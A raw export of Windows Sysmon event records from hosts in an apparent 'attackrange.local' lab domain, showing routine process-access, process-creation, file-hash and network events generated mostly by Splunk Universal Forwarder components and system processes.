07:55:51.515{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.515{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F587-60EB-567D-00000000CF01}8028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.515{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F587-60EB-567D-00000000CF01}8028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.516{466BC892-F587-60EB-567D-00000000CF01}8028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.268{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=591D40465E58F0CBE5D68D54F678D01B,SHA256=79645AAA163EF3C316465F1B25DD245A5E304569F1D4ADB806B583B92E122405,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:51.268{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A97593A9225E5F82ED9087A5394EF0C5,SHA256=F80A6FA355F533924E50F380745C05FD052EAE453AF1E367800F0E41AA958CB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.100{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38178944FD9A681183521F84E8B23334,SHA256=66335BDB9582514E2283D756B825D6383F571935F18B157EC9F11F8AF9D48A23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808209Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:52.210{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE876CC5218A4D085E28CFEDB0AAED1B,SHA256=28D3328962E4140E25716829889B58565AA2E9986659227EFA5540DFF7336800,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.931{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F588-60EB-587D-00000000CF01}9612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001050224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.916{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F588-60EB-587D-00000000CF01}9612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.916{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:52.916{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.916{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:52.916{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.916{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F588-60EB-587D-00000000CF01}9612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.901{466BC892-F588-60EB-587D-00000000CF01}9612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.631{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.531{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=591D40465E58F0CBE5D68D54F678D01B,SHA256=79645AAA163EF3C316465F1B25DD245A5E304569F1D4ADB806B583B92E122405,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:44.638{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51077-false10.0.1.12-8000- 10341000x80000000000000001050214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.400{466BC892-F588-60EB-577D-00000000CF01}84086236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.198{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F588-60EB-577D-00000000CF01}8408C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.198{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:52.198{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.198{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:52.198{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.198{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F588-60EB-577D-00000000CF01}8408C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.183{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F588-60EB-577D-00000000CF01}8408C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.184{466BC892-F588-60EB-577D-00000000CF01}8408C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.100{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=310E2CC209F19E5A6998B145965C75FC,SHA256=068C2E637FC377025473410D36F4854DE74874F30DF17CF60BE3D6CA00E57159,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808210Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:53.225{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A26BD775EBB045CDE704FC79717B2D8A,SHA256=943A30062B48799EAD49B378AC25D9005993AE71D03DEEA68E435EC93D61F512,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.901{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8FE799F5F0FA6938F03DCDE28FDD86E0,SHA256=652644886369E3A45133D6E0ED17ABC3E660E2B910A1D99FF06949C15046D228,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.817{466BC892-F589-60EB-597D-00000000CF01}88209304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
